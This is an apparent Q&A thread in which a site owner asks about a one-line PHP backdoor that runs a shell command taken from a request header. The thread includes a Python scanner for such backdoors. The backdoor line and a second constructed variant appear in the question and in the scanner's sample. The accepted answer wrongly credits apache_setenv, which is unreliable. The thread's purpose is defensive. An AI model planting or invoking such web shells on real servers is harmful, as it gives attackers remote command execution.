
I've found a php backdoor on my host.

<? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?>

I see in the access log that requests to that PHP file were POST requests, but I don't know how the SETENV of that variable was set; could someone explain how such a variable can be set and, if possible, where I can limit/disable setting such variables on the server side.

thanks

-H.

Hrvoje Špoljar
  • Are you merely investigating this, or do you need to close a security hole by patching the code? – outis Jul 22 '11 at 01:43
  • @Hrvoje - sorry, this question should never have been migrated here. This is a question about php and security, so if it belongs anywhere on the network it would be at security.se – Mark Henderson Jul 22 '11 at 02:13
  • I'm investigating, yes; trying to understand how things work; I've put it on the coders' site but they moved it to Server Fault ... gah – Hrvoje Špoljar Jul 22 '11 at 10:43
  • HTTP_ACCEPT_TROLOLO is automatically set by PHP & Apache if there's an Accept-Trololo header. You may detect this header for removal with mod_security, but the real problem is the presence of the PHP script (as another legacy header could be used) – regilero Jul 22 '11 at 15:59
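To make regilero's point concrete, here is an added example (not from the question or any answer) that does two things a defender would want: it reproduces the CGI convention under which Apache and PHP turn an arbitrary request header such as `Accept-Trololo` into the meta-variable `HTTP_ACCEPT_TROLOLO`, and it scans PHP source for the signature of this backdoor, a command-execution function fed directly from a `getenv('HTTP_*')` or `$_SERVER['HTTP_*']` value. The sample PHP embedded in the block is constructed for the demonstration (the line from the question plus one benign and one further hypothetical malicious line); the header names used as input and the file extensions scanned are assumptions.

```python
"""Header-to-CGI-variable mapping and a scanner for header-driven PHP backdoors."""
import os
import re

# CGI convention (RFC 3875), which Apache and PHP follow: every request header
# "Foo-Bar: v" is exposed as HTTP_FOO_BAR=v (uppercased, '-' becomes '_',
# prefixed with HTTP_). Content-Type and Content-Length are exposed without
# the prefix. This is why an attacker-chosen header name ends up in getenv().
def header_to_cgi_var(name: str) -> str:
    key = name.strip().upper().replace("-", "_")
    if key in ("CONTENT_TYPE", "CONTENT_LENGTH"):
        return key
    return "HTTP_" + key


def cgi_environment(headers: dict) -> dict:
    """Map a dict of request headers to the CGI meta-variables a script sees."""
    return {header_to_cgi_var(k): v for k, v in headers.items()}


# Detection: a command-execution function whose argument is taken straight
# from a request-controlled HTTP_* variable, via getenv() or $_SERVER.
EXEC_FUNCS = r"\b(?:passthru|system|exec|shell_exec|popen|proc_open)"
SOURCE = (
    r"(?:getenv\s*\(\s*['\"]?HTTP_\w+['\"]?\s*\)"
    r"|\$_SERVER\s*\[\s*['\"]HTTP_\w+['\"]\s*\])"
)
BACKDOOR_RE = re.compile(EXEC_FUNCS + r"\s*\(\s*" + SOURCE, re.IGNORECASE)


def find_header_backdoors(php_source: str) -> list:
    """Return (line_number, matched_text) for each suspicious call in a PHP string."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in BACKDOOR_RE.finditer(line):
            hits.append((lineno, m.group(0)))
    return hits


def scan_tree(root: str) -> dict:
    """Scan a directory tree of PHP files; returns {path: [(line, text), ...]}."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".phtml", ".inc")):  # assumed set
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_header_backdoors(fh.read())
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings


# Constructed sample: the snippet from the question, a benign header read,
# and a hypothetical second backdoor using $_SERVER. Not real site code.
SAMPLE_PHP = """<?php
// benign: reads a header but never executes it
$lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
echo htmlspecialchars($lang);
?>
<? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?>
<?php system($_SERVER["HTTP_X_CMD"]); ?>
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            for lineno, text in hits:
                print(f"{path}:{lineno}: {text}")
    else:
        # Show why the backdoor is reachable remotely: the header name alone
        # selects the variable the script reads. (Constructed header values.)
        print(cgi_environment({"Accept-Trololo": "<value>", "User-Agent": "x"}))
        for lineno, text in find_header_backdoors(SAMPLE_PHP):
            print(f"sample line {lineno}: {text}")
```

Run it with a document root as the argument to sweep a host; run it with no arguments to see the mapping and the matches on the embedded sample. Because the web server's default access log records neither request headers nor POST bodies, the log alone cannot show whether the header was present; adding `%{Accept-Trololo}i` to the Apache LogFormat records it for future requests, and a mod_security rule on that header, as regilero says, only blocks one header name while the script stays in place, so removing the file and finding how it got there is the actual fix.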

1 Answer


it was set by apache_setenv();

Search for

apache_setenv("HTTP_ACCEPT_TROL

or

apache_setenv('HTTP_ACCEPT_TROL

and you'll find your answer

genesis
  • that may be so; but I see no way how that could be done remotely; hence what is the use of a backdoor if you can't use it remotely? – Hrvoje Špoljar Jul 22 '11 at 00:34
  • " and ' ... it can be both – genesis Jul 22 '11 at 00:35
  • you would maybe get way by telling us that apache env – genesis Jul 22 '11 at 00:36
  • This question is clearly off topic (it's not programming related in any sense and belongs on serverfault). Please don't answer such questions; it encourages others to post similar off topic questions and clutters the site, making it less effective as a resource. With 5K+ rep, you should be familiar with what's on topic and what's not; if you're not, please read the [FAQ](http://stackoverflow.com/faq) so that you are more so. Thanks. :) –  Jul 22 '11 at 00:36
  • @KenWhite: His question contains PHP code, and it maybe does (not necessarily though) belong on serverfault. It could be just PHP code, or a server-side implementation. Nobody knows – genesis Jul 22 '11 at 00:38